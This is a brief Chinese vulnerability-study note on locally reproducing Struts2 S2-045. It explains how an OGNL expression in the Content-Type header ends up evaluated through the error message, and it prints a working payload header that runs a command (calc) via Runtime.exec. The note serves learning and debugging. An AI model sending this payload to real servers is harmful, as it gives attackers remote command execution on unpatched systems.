[漏洞学习]
复现分析:https://xz.aliyun.com/t/4662
s2环境:S2-045本地复现与分析_Au-CSDN博客正波师傅nb
[分析]
request链比较长,适合debug单步调试学习。具体原因在content-type输入恶意的ongl表达式之后抛出异常,并将ongl表达式包含到了返回的错误信息中,达到命令执行的效果
payload:
Content-Type: start_not_with_multipart_but_contains__multipart/form-data %{#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,@java.lang.Runtime@getRuntime().exec('calc')};
request调用链:
request请求大部分都是在浅黄色的过滤器和绿色的拦截器中间流转。